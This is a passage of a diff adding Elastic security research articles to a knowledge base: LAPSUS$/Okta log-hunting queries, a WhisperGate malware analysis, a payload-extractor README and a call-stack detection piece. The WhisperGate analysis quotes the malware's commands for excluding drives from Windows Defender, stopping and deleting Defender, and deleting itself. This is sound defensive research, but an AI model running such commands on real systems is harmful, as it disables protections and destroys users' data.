+The LAPSUS$ group emerged onto the scene a number of months ago, targeting high-profile organizations such as Nvidia, Samsung, and Ubisoft — making various demands that in some cases, resulted in either data dumps or screenshots of internal systems shared via the group’s Telegram account. These were sometimes determined by user-voted polls within the group, suggesting that this is only the beginning of a series of attacks the group is undertaking more frequently as they gain press coverage.
+
+Groups of this nature focus on data theft and extortion via means of social engineering — commonly, targeted spear phishing campaigns.
+
+The latest organization under the microscope of the LAPSUS$ group is Okta, the identity provider for thousands of companies of all sizes. Surprisingly, LAPSUS$ chose to note in their release of information that their targeting of Okta was not for access to Okta’s systems, but rather that of their customers:
+
+![A screenshot of the Telegram account that LAPSUS$ has coordinated, showing access to internal communication, administrative and customer tools, as well as customer accounts](/assets/images/okta-and-lapsus-what-you-need-to-know/1.jpg)
+
+## The latest target: Okta
+
+After LAPSUS$ sent a notification last night to the Telegram account, Okta’s CEO responded with a series of Tweets and an [<u>official statement</u>](https://sec.okta.com/articles/2022/03/official-okta-statement-lapsus-claims) regarding the suspected compromise, stating that it occurred in January 2022, similar to dates visible in the screenshots from Telegram post:
+
+![Todd McKinnon confirmed on Twitter some details surrounding the attack on Okta infrastructure via a subprocessor](/assets/images/okta-and-lapsus-what-you-need-to-know/2.jpg)
+
+![An official statement by David Bradbury, the CSO at Okta, posted March 22](/assets/images/okta-and-lapsus-what-you-need-to-know/3.jpg)
+
+![The updated statement provided by Okta, suggesting that no immediate action by customers is needed](/assets/images/okta-and-lapsus-what-you-need-to-know/4.jpg)
+
+![After this publication, LAPSUS$ published this response](/assets/images/okta-and-lapsus-what-you-need-to-know/5.png)
+
+![Further updates provided by the CSO at Okta at 6.31 PM](/assets/images/okta-and-lapsus-what-you-need-to-know/Okta-CISO-Update.jpg)
+
+While the initial notice provided some insights into potential scope and timing of the incident, many customers are still interested in identifying the scope of the access, and how to assess if there is any local impact within their organization.
+
+The updated notice released by Okta suggested that access was limited to a specific end-user system with no ability to create or delete users or download customer information. However, it did have the ability to reset passwords and MFA tokens for users, while not obtaining access to them. Responses from LAPSUS$ are included for context, and suggest more may need to be investigated.
+
+In the third update notification shared by David Bradbury at Okta, a correction was made indicating that a small (2.5% of customer base) were potentially impacted by the incident. Further details will be shared via a Webinar scheduled at 8AM, PDT Wednesday, March 23rd.. A link to sign up for the webinar is located within the [aforementioned update post.](https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/)
+
+As more information pertaining to the breach is released by either LAPSUS$ or Okta, we will maintain the accuracy of information shared within this post.
+
+## Threat hunting Okta logs in Elastic
+
+The good news is that customers of Okta do have access to relatively comprehensive log information regarding activity within their account. Okta has configured a default 90 day retention window for system events. Okta [<u>released an updated statement</u>](https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/) stating customers do not have to respond to the incident immediately, but for those wishing to investigate further, the following threat hunting information is still valuable.
+
+The process to get started with ingesting Okta logs is simple — a prebuilt integration for Okta Log ingestion is available as a one-click module configurable within Kibana:
+
+![Integrations for Okta are available via One-click installation within the Elastic webapp](/assets/images/okta-and-lapsus-what-you-need-to-know/6.jpg)
+
+Alternatively, the [<u>Okta Filebeat Module</u>](https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-okta.html#filebeat-module-okta) can easily be added to Elastic to provide insights into previous account activity.
+
+Configuring the Okta Module is simple, providing you tweak the initial_interval value to 90 days:
+
+```
+~ ~ ~
+- module: okta
+  system:
+    var.url: https://yourOktaDomain/api/v1/logs
+    var.api_key: XXXX-XXXX...XXXX-XXXX'
+    var.initial_interval: 90d # will fetch events starting 90 days ago.
+~ ~ ~
+```
+
+![A prebuilt dashboard that is shipped alongside the Okta Module for Filebeat](/assets/images/okta-and-lapsus-what-you-need-to-know/7.jpg)
+
+Once events are ingested, a number of Lucene queries are easily leveraged for early/initial signs of compromise. While these events are not a comprehensive set of queries, they should provide ample detail for any security team to investigate potential suspicious activity:
+
+MFA device reset via console for any user:
+
+###### event.module:"okta" AND event.action:"user.mfa.factor.reset_all"
+
+User Account email update records updated to a new value:
+
+###### event.module:"okta" AND event.action:"user.account.update_primary_email"
+
+User Privilege granted for an account within your Okta organization:
+
+###### event.module:"okta" AND event.action:"user.account.privilege.grant"
+
+Okta Administrative staff have a series of privileges that allow for user-impersonation via their management service. Logs pertaining to this action should be inspected:
+
+###### event.module:okta AND (event.action:user.session.impersonation.grant OR event.action:user.session.impersonation.initiate)
+
+There are many other ways to look for suspicious activity in your Okta data. In addition to these queries, Elastic provides a large set of prebuilt detections for suspicious Okta activity used by other adversarial groups in our [<u>open detection-rules repo</u>](https://github.com/elastic/detection-rules/tree/main/rules/integrations/okta). This will be useful in generating alerts as Okta logs are coming into Elastic. You can use the query logic in those rules to drive other hunts beyond the four we mention above as well.
+
+![A snapshot of the current rules pertaining to Okta ingested data within Elastic Security](/assets/images/okta-and-lapsus-what-you-need-to-know/8.png)
+
+> _Not familiar with what suspicious Okta data looks like?_
+>
+> _Read the_ [<u><em>blog</em></u>](https://www.elastic.co/blog/testing-okta-visibility-and-detection-dorothy) _from December 2020 where we discussed the subject and released an open adversary simulation tool called_ [<u><em>Dorothy</em></u>](https://github.com/elastic/dorothy) _to help security teams test_ _visibility, monitoring, and detection capabilities for Okta logs._
+>
+> _We expect many security teams will give SSO logs extra attention in light of this incident, and this tool may help teams get up to speed on the subject._
+
+## Earlier events: Microsoft, Nvidia, Samsung, Ubisoft
+
+As previously stated, the LAPSUS$ group has been on a serious compromise train over the past few months, targeting a number of high-profile targets. Numerous details have been shared across a number of different media outlets, and a common theme of social engineering and internal access has been observed across many of the attacks:
+
+- [<u>37GB of Source Code was leaked from Microsoft</u>](https://www.bleepingcomputer.com/news/microsoft/lapsus-hackers-leak-37gb-of-microsofts-alleged-source-code/) in an earlier dump identified this week
+- [<u>Ubisoft </u>](https://www.zdnet.com/article/ubisoft-reveals-security-incident-forcing-company-wide-password-refresh/#ftag=RSSbaffb68)- Company-wide password reset after unusual activity identified on systems located
+- [<u>Nvidia issues</u>](https://www.zdnet.com/article/ubisoft-reveals-security-incident-forcing-company-wide-password-refresh/#ftag=RSSbaffb68) notice after internal systems indicate data compromise
+- [<u>Samsung confirms source-code</u>](https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code) compromise via the LAPSUS$ group
+
+As further information is uncovered, and mechanisms for detection improve, Elastic Security will continue to provide further updates to this and provide subsequent posts relating to detections.
+
+If you haven’t checked out the Elastic Security solution, take a look at our [<u>Quick Start guides</u>](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [<u>free fundamentals training courses</u>](https://www.elastic.co/training/free#fundamentals). You can always get started with a [<u>free 14-day trial of Elastic Cloud</u>](https://cloud.elastic.co/registration). Or [<u>download</u>](https://www.elastic.co/downloads/) the self-managed version of the Elastic Stack for free.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/operation_bleeding_bear.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/operation_bleeding_bear.md
new file mode 100644
index 0000000000000..6cde6e5cfd38f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/operation_bleeding_bear.md
@@ -0,0 +1,265 @@
+---
+title: "Operation Bleeding Bear"
+slug: "operation-bleeding-bear"
+date: "2022-12-06"
+description: "Elastic Security verifies new destructive malware targeting Ukraine: Operation Bleeding Bear"
+author:
+  - slug: daniel-stepanic
+  - slug: james-spiteri
+  - slug: joe-desimone
+  - slug: mark-mager
+  - slug: andrew-pease
+image: "bleeding-bear.jpg"
+category:
+  - slug: campaigns
+tags:
+  - bleeding bear
+  - destructive
+  - ransomware
+  - malware
+---
+
+## Key Takeaways
+
+- Elastic Security provides new analysis and insights into targeted campaign against Ukraine organizations with destructive malware reported over the weekend of Jan 15, 2022
+- Techniques observed include process hollowing, tampering with Windows Defender, using a Master Boot Record (MBR) wiper, and file corruptor component
+- Elastic Security prevents each stage of the described campaign using prebuilt endpoint protection features
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image16.jpg)
+
+## Overview
+
+Over this past weekend (1/15/2022), Microsoft released details of a new [campaign targeting Ukrainian government entities](https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/) and organizations with destructive malware. In a multi-staged attack, one malware component known as WhisperGate utilizes a wiping capability on the Master Boot Record (MBR), making any machine impacted inoperable after boot-up.
+
+Within another stage, a file infector component is used to corrupt files in specific directories with specific file extensions. The elements used in this campaign lack the common characteristics of a ransomware compromise – in this case the adversary uses the same Bitcoin address for each victim and offers no sign of intent to decrypt the victim’s machine.
+
+The Ukrainian National Cyber Security Coordination Center has been referring to this threat activity on its official [Twitter](https://twitter.com/ncsccUA/status/1482733473228013569?s=20) and [Facebook](https://www.facebook.com/ncsccUA/posts/449966023412420) accounts as Operation Bleeding Bear.
+
+![Translation: Update information on the cyber attack on January 13-14 on Ukrainian infrastructure. For a coordinated response report the incident: report@ncscc.gov.ua](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image12.jpg)
+
+**Elastic users are fully protected** from attacks like these through our advanced malware detection and Ransomware Protection capabilities in the platform. The Elastic Security team continues to monitor these events. This case highlights the importance of prevention when it’s up against ransomware and malware with destructive capabilities.
+
+### Stage 1: WhisperGate MBR payload
+
+The Master Boot Record (MBR) is software that executes stored start-up information and, most importantly, informs the system of the location of the bootable partition on disk that contains the user’s operating system. If tampered with, this can result in the system being inoperable – a common tactic for malware and ransomware campaigns over the years to interrupt operation of the infected system.
+
+The stage 1 binary is named stage1.exe and has low complexity. A 8192 byte buffer containing the new MBR data that includes the ransom note is allocated on the stack. A file handle is retrieved from **CreateFileW** pointing to the first physical drive which represents the MBR. That file handle is then called by **WriteFile** which takes only 512 bytes from the buffer writing over the Master Boot Record.
+
+## Malware analysis breakdown (Stages 1-4)
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image2.jpg)
+
+The host is subsequently rendered inoperable during the next boot-up sequence. Below is a screenshot showing the ransom note from an affected virtual machine.
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image3.jpg)
+
+Contained within the ransom note are instructions soliciting payment to a bitcoin wallet address of [1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv](https://www.blockchain.com/btc/address/1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv). The wallet does not appear to have received funds from victims as of the publication of this post.
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image5.jpg)
+
+### Stage 2/3: Discord downloader and injector
+
+Once the payload has gained a foothold, further destructive capabilities are facilitated by the stage 2 binary, called stage2.exe. This binary pulls down and launches a payload hosted via the Discord content delivery network, a [recently](https://www.riskiq.com/blog/external-threat-management/discord-cdn-abuse-malware/) [reported](https://www.zscaler.com/blogs/security-research/discord-cdn-popular-choice-hosting-malicious-payloads) approach which is increasingly being used by malicious actors.
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image1.jpg)
+
+The obfuscated .NET payload (described as Stage 3 below) is then executed in memory, setting off a number of events including:
+
+- Writing and executing a VBS script that uses PowerShell to add a Windows Defender exclusion on the root directory (C:)
+
+```
+Writing and executing a VBS script
+
+"C:\Windows\System32\WScript.exe""C:\Users\jim\AppData\Local\Temp\Nmddfrqqrbyjeygggda.vbs"
+
+```
+
+```
+Uses PowerShell to add a Windows Defender exclusion
+
+powershell.exe Set-MpPreference -ExclusionPath 'C:\'
+```
+
+[AdvancedRun](https://www.nirsoft.net/utils/advanced_run.html), a program used to run Windows applications with different settings, is then dropped to disk and executed in order to launch the Service Control Manager and stop the Windows Defender service (WinDefend).
+
+```
+AdvancedRun is used to stop Windows Defender
+
+"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" `
+  /WindowState 0 /CommandLine "stop WinDefend"  /StartDirectory "" /RunAs 8 /Run
+
+```
+
+AdvancedRun is used again when launching PowerShell to recursively delete the Windows Defender directory and its files.
+
+```
+AdvancedRun deleting the Windows Defender directory
+
+"C:\Users\jim\AppData\Local\Temp\AdvancedRun.exe" `
+  /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 `
+  /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" `
+  /StartDirectory "" /RunAs 8 /Run
+```
+
+Copies InstallUtil.exe is a command-line utility that allows users to install and uninstall server resources from the local machine into the user’s %TEMP% directory. This action leverages the file for [process hollowing](https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process) by launching it in a suspended state.
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image14.jpg)
+
+It then proceeds to allocate memory (VirtualAllocEx , write the file corruptor payload (described as the Final Stage below) into memory (WriteProcessMemory), modify the thread entry point (SetThreadContext) to point to the file corruptor entry point, and start execution of the file corruptor (ResumeThread).
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image8.jpg)
+
+### Final stage: File corruptor
+
+The final file corruptor payload is loaded in memory via process hollowing to the InstallUtil process. The file corruptor:
+
+- Targets any local hard drives, attached USB drives, or mounted network shares
+- Scans directories for files matching internal hard-coded extension list (excluding the Windows folder)
+
+```
+.3DM .3DS .602 .7Z .ACCDB .AI .ARC .ASC .ASM .ASP .ASPX .BACKUP .BAK .BAT .BMP .BRD
+.BZ .BZ2 .C .CGM .CLASS .CMD .CONFIG .CPP .CRT .CS .CSR .CSV .DB .DBF .DCH .DER .DIF
+.DIP .DJVU.SH .DOC .DOCB .DOCM .DOCX .DOT .DOTM .DOTX .DWG .EDB .EML .FRM .GIF .GO
+.GZ .H .HDD .HTM .HTML .HWP .IBD .INC .INI .ISO .JAR .JAVA .JPEG .JPG .JS .JSP .KDBX
+.KEY .LAY .LAY6 .LDF .LOG .MAX .MDB .MDF .MML .MSG .MYD .MYI .NEF .NVRAM .ODB .ODG .ODP
+.ODS .ODT .OGG .ONETOC2 .OST .OTG .OTP .OTS .OTT .P12 .PAQ .PAS .PDF .PEM .PFX .PHP .PHP3
+.PHP4 .PHP5 .PHP6 .PHP7 .PHPS .PHTML .PL .PNG .POT .POTM .POTX .PPAM .PPK .PPS .PPSM .PPSX
+.PPT .PPTM .PPTX .PS1 .PSD .PST .PY .RAR .RAW .RB .RTF .SAV .SCH .SHTML .SLDM .SLDX .SLK
+.SLN .SNT .SQ3 .SQL .SQLITE3 .SQLITEDB .STC .STD .STI .STW .SUO .SVG .SXC .SXD .SXI .SXM
+.SXW .TAR .TBK .TGZ .TIF .TIFF .TXT .UOP .UOT .VB .VBS .VCD .VDI .VHD .VMDK .VMEM .VMSD
+.VMSN .VMSS .VMTM .VMTX .VMX .VMXF .VSD .VSDX .VSWP .WAR .WB2 .WK1 .WKS .XHTML .XLC .XLM
+.XLS .XLSB .XLSM .XLSX .XLT .XLTM .XLTX .XLW .YML .ZIP
+
+```
+
+- Overwrites the start of each targeted file with 1MB of static data (byte 0xCC), regardless of file size
+- Renames each targeted file to a randomized extension
+- Deletes self with the command:
+
+```
+Overwriting, renaming, and deleting files
+
+cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q <running process path>
+
+```
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image9.jpg)
+
+## MBR protection with Elastic Security
+
+Changes to the MBR are particularly strong signals of anomalous and destructive activity typically associated with ransomware. To counteract this, Elastic security researchers built an MBR protection component based around these signals into our multi-layered ransomware protection feature.
+
+When a process attempts to overwrite the contents of the MBR, the prewrite buffer and other associated process metadata will be analyzed inline before any changes are written to disk. If the activity is deemed malicious in nature, the process will either be terminated immediately (prevention mode) and / or an appropriate ransomware alert will be generated (prevention and detection modes) to allow security operators time to respond.
+
+When configured in prevention mode, Elastic Security’s ransomware protection ensures that the integrity of the MBR is fully preserved, with no changes ever reaching disk thanks to the synchronous framework leveraged by the feature — effectively preventing the ransomware attack in their tracks as the offending process is terminated.
+
+When WriteFile is invoked on PhysicalDrive0 on a host running Elastic Security with ransomware protection enabled, the pending change will immediately be analyzed and deemed malicious. Afterwards, the process will be terminated, the endpoint user will be alerted via a popup notification, and a ransomware prevention alert will be sent to and stored in Elasticsearch. The intended ransom note can be easily deciphered after Base64 decoding the contents of the prewrite buffer found in the alert within Kibana.
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image13.jpg)
+
+It is important to note that while this behaviour is detected by Elastic, it is not specific to this payload and rather the behaviour the payload is exhibiting. This increases our chance of being able to detect and prevent malicious behaviors, even when a static signature of the malware is not known. Threat actors find this kind of control more difficult to evade than traditional, signature-based detection and prevention approaches.
+
+## Observing WhisperGate in Elastic Security
+
+By observing the process hash of the stage 1 dropper above (a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92) via the process.hash function within Elastic Security, we can isolate the ransomware alert and analyze the blocked attempt at overwriting the MBR.
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image7.png)
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image4.jpg)
+
+As we can see, the data is stored as a Base64 encoded string in Elasticsearch. Decoded, we can see the contents of the ransom note that would be displayed to the end user of an affected system.
+
+![](/assets/images/operation-bleeding-bear/operation-bleeding-bear-image6.png)
+
+## Alert breakdown and defensive recommendations
+
+The following alerts were triggered in Elastic Security during our investigations:
+
+### Endpoint Security Integration Alerts
+
+#### Stage 1 - MBR Wiper
+
+(a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92)
+
+- Malware Prevention Alert
+- Ransomware Prevention Alert (MBR overwrite)
+
+#### Stage 2 - Downloader
+
+(dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78)
+
+- Malware Prevention Alert
+
+#### Stage 3 + Stage 4 - Injector/File Corruptor
+
+(34CA75A8C190F20B8A7596AFEB255F2228CB2467BD210B2637965B61AC7EA907)
+
+- Ransomware Prevention Alert (canary files)
+- Malicious Behaviour Prevention Alert - Binary Masquerading via Untrusted Path
+- Memory Threat Prevention Alert
+
+### Prebuilt Detection Engine Alerts
+
+The following existing [public detection rules](https://github.com/elastic/detection-rules) can also be used to detect some of the employed techniques:
+
+- [Suspicious Execution via Windows Management Instrumentation (WMI)](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_suspicious_cmd_wmi.toml)
+- [Windows Defender Exclusions Added via PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml)
+- [Connection to Commonly Abused Web Services](https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_common_webservices.toml)
+- [Process Execution from an Unusual Directory](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_from_unusual_directory.toml)
+- [Windows Script Executing PowerShell](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/initial_access_script_executing_powershell.toml)
+- [Disabling Windows Defender Security Settings via PowerShell](https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml)
+
+### Hunting queries
+
+Detect attempt to tamper with Windows defender settings via [NirSoft AdvancedRun](https://www.nirsoft.net/utils/advanced_run.html) executed by [the Stage 3 injector](https://www.virustotal.com/gui/file/923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6/community):
+
+```
+Detect attempts to tamper with Windows Defender
+
+process where event.type == "start" and
+process.pe.original_file_name == "AdvancedRun.exe" and
+process.command_line :
+   ("*rmdir*Windows Defender*Recurse*",
+    "*stop WinDefend*")
+```
+
+Masquerade as InstallUtil via code injection:
+
+```
+Identifies code injection with InstallUtil
+
+process where event.type == "start" and
+process.pe.original_file_name == "InstallUtil.exe" and
+not process.executable : "?:\\Windows\\Microsoft.NET\\*"
+```
+
+## MITRE ATT&CK
+
+- [T1561.002 - Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002/)
+- [T1562.001 - Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001/)
+- [T1047 - Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/)
+- [T1102 - Web Service](https://attack.mitre.org/techniques/T1102/)
+- [T1055 - Process Injection](https://attack.mitre.org/techniques/T1055/)
+- [T1027 - Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)
+
+## Summary
+
+These targeted attacks on Ukraine using destructive malware match a similar pattern observed in the past such as [NotPetya](https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/). By leveraging different malware components to wipe machines and corrupt files, it’s apparent there was no intent to recover any funds, but likely a technique used to sow chaos and doubt into Ukraine’s stability.
+
+As these events are still ongoing, we wanted to release some initial analysis and observations from our perspective. We also wanted to highlight the prevention capabilities of Elastic Security across each stage of this attack, available to everyone today.
+
+Existing Elastic Security users can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?elektra=whats-new-elastic-security-7-16-blog).
+
+## Indicators
+
+| Indicator                                                        | Type   | Note                         |
+| ---------------------------------------------------------------- | ------ | ---------------------------- |
+| a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 | SHA256 | Stage1.exe (MBR wiper)       |
+| dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 | SHA256 | Stage2.exe (Downloader)      |
+| 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 | SHA256 | Stage3 (Injector - original) |
+| 9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d | SHA256 | Stage3 (Injector - fixed)    |
+| 34CA75A8C190F20B8A7596AFEB255F2228CB2467BD210B2637965B61AC7EA907 | SHA256 | Stage4 (File Corruptor)      |
+
+## Artifacts
+
+Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc57bd32cdaea24f7/628e88d8b385dc5352428ffc/bleeding-bear-indicators.zip) in both ECS and STIX format in a combined zip bundle.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/parallax_payload_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/parallax_payload_extractor.md
new file mode 100644
index 0000000000000..ac2ff38b46d4b
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/parallax_payload_extractor.md
@@ -0,0 +1,59 @@
+---
+title: "PARALLAX Payload Extractor"
+slug: "parallax-payload-extractor"
+date: "2022-12-06"
+description: "Python script to extract the payload from PARALLAX samples."
+author:
+  - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+  - slug: tools
+tags:
+  - parallax
+  - ref2731
+---
+
+Python script to extract the payload from PARALLAX samples.
+
+[Download parallax-payload-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdcec03c5c91923f5/633613d524bebb2394c2773d/parallax-payload-extractor.tar.gz)
+
+> For information on the PARALLAX malware loader and campaign observations, check out our [blog posts](https://elastic.co/security-labs/exploring-the-ref2731-intrusion-set) detailing this intrusion set.
+
+## Getting started
+
+### Docker
+
+The recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.
+
+```
+docker build . -t parallax_loader_payload_extractor
+```
+
+Then we run the container with the -v flag to map a host directory to the docker container directory.
+
+```
+docker run -ti --rm -v $(pwd)/data:/data parallax_loader_payload_extractor:latest --help
+```
+
+### Running it locally
+
+As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script.
+
+```
+poetry lock
+poetry install
+poetry shell
+parallax_loader_payload_extractor --help
+```
+
+## Usage
+
+We can either specify a single sample with **-f** option or a directory of samples with **-d**. You can use the -o switch to set the output directory of the payloads.
+
+```
+docker run -ti --rm -v $(pwd)/data:/data parallax_loader_payload_extractor:latest -d /data -o /data
+```
+
+![PARALLAX payload extractor](/assets/images/parallax-payload-extractor/image41.jpg)
+
+You can collect the extracted payloads from the directory you set when running the extractor, the data directory in the root of the extractor in the above example.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/peeling_back_the_curtain_with_call_stacks.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/peeling_back_the_curtain_with_call_stacks.md
new file mode 100644
index 0000000000000..bc85b1afec224
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/peeling_back_the_curtain_with_call_stacks.md
@@ -0,0 +1,337 @@
+---
+title: "Peeling back the curtain with call stacks"
+slug: "peeling-back-the-curtain-with-call-stacks"
+date: "2023-09-13"
+description: "In this article, we'll show you how we contextualize rules and events, and how you can leverage call stacks to better understand any alerts you encounter in your environment."
+author:
+  - slug: samir-bousseaden
+image: "photo-edited-10@2x.jpg"
+category:
+  - slug: security-operations
+  - slug: security-research
+  - slug: detection-science
+tags:
+  - detection engineering
+  - threat hunting
+  - threat detection
+---
+
+## Introduction
+Elastic Defend provides over [550 rules](https://github.com/elastic/protections-artifacts/tree/main/behavior/rules) (and counting) to detect and stop malicious behavior in real time on endpoints. We recently [added kernel call stack enrichments](https://www.elastic.co/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks) to provide additional context to events and alerts. Call stacks are a win-win-win for behavioral protections, simultaneously improving false positives, false negatives, and alert explainability. In this article, we'll show you how we achieve all three of these, and how you can leverage call stacks to better understand any alerts you encounter in your environment.
+
+## What is a call stack?
+When a thread running function A calls function B, the CPU automatically saves the current instruction’s address (within A) to a thread-specific region of memory called the stack. This saved pointer is known as the return address - it's where execution will resume once the B has finished its job. If B were to call a third function C, then a return address within B will also be saved to the stack. These return addresses can be retrieved through a process known as a [stack walk](https://learn.microsoft.com/en-us/windows/win32/debug/capturestackbacktrace), which reconstructs the sequence of function calls that led to the current thread state. Stack walks list return addresses in reverse-chronological order, so the most recent function is always at the top.
+
+In Windows, when we double-click on **notepad.exe**, for example, the following series of functions are called: 
+
+ - The green section is related to base thread initialization performed by the operating system and is usually identical across all operations (file, registry, process, library, etc.)
+ - The red section is the user code; it is often composed of multiple modules and provides approximate details of how the process creation operation was reached
+ - The blue section is the Win32 and Native API layer; this is operation-specific, including the last 2 to 3 intermediary Windows modules before forwarding the operation details for effective execution in kernel mode
+
+The following screenshot depicts the call stack for this execution chain:
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image17.png)
+
+Here is an example of file creation using **notepad.exe** where we can see a similar pattern: 
+
+ - The blue part lists the last user mode intermediary Windows APIs before forwarding the create file operation to kernel mode drivers for effective execution
+ - The red section includes functions from **user32.dll** and **notepad.exe**, which indicate that this file operation was likely initiated via GUI
+ - The green part represents the initial thread initialization
+ 
+ ![](/assets/images/peeling-back-the-curtain-with-call-stacks/image19.png)
+
+## Events Explainability
+
+Apart from using call stacks for finding known bad, like [unbacked memory regions](https://www.elastic.co/security-labs/hunting-memory) with RWX permissions that may be the remnants of prior code injection. Call stacks provide very low-level visibility that often reveals greater insights than logs can otherwise provide. 
+
+As an example, while hunting for suspicious process executions started by **WmiPrvSe.exe** via WMI, you find this instance of **notepad.exe**:
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image21.png)
+
+Reviewing the standard event log fields, you may expect that it was started using the [Win32_Process](https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-process) class using the **wmic.exe process call create notepad.exe** syntax. However, the event details describe a series of modules and functions: 
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image12.png)
+
+The blue section depicts the standard intermediary **CreateProcess** Windows APIs, while the red section highlights better information in that we can see that the DLL before the first call to **CreateProcessW** is **wbemcons.dll** and when inspecting its properties we can see that it’s related to [WMI Event Consumers](https://learn.microsoft.com/en-us/windows/win32/wmisdk/commandlineeventconsumer). We can conclude that this **notepad.exe** instance is likely related to a WMI Event Subscription. This will require specific incident response steps to mitigate the WMI persistence mechanism.
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image22.png)
+
+Another great example is Windows scheduled tasks. When executed, they are spawned as children of the Schedule service, which runs within a **svchost.exe** host process. Modern Windows 11 machines may have 50 or more **svchost.exe** processes running.  Fortunately, the Schedule service has a specific process argument **-s Schedule** which differentiates it: 
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image8.png)
+
+In older Windows versions, the Scheduled Tasks service is a member of the Network Service group and executed as a component of the **netsvcs** shared **svchost.exe** instance. Not all children of this process are necessarily scheduled tasks in these older versions: 
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image2.png)
+
+Inspecting the call stack on both versions, we can see the module that is adjacent to the **CreateProcess** call is the same **ubpm.dll** (Unified Background Process Manager DLL) executing the exported function **ubpm.dll!UbpmOpenTriggerConsumer**:
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image4.png)
+
+Using the following KQL query, we can hunt for task executions on both versions: 
+
+```
+event.action :"start" and 
+process.parent.name :"svchost.exe" and process.parent.args : netsvcs and 
+process.parent.thread.Ext.call_stack_summary : *ubpm.dll* 
+```
+
+![](/assets/images/peeling-back-the-curtain-with-call-stacks/image18.png)
+
+Another interesting example occurs when a user double-clicks a script file from a ZIP archive that was opened using Windows Explorer. Looking at the process tree, you will see that **explorer.exe** is the parent and the child is a script interpreter process like **wscript.exe** or **cmd.exe**. 
+
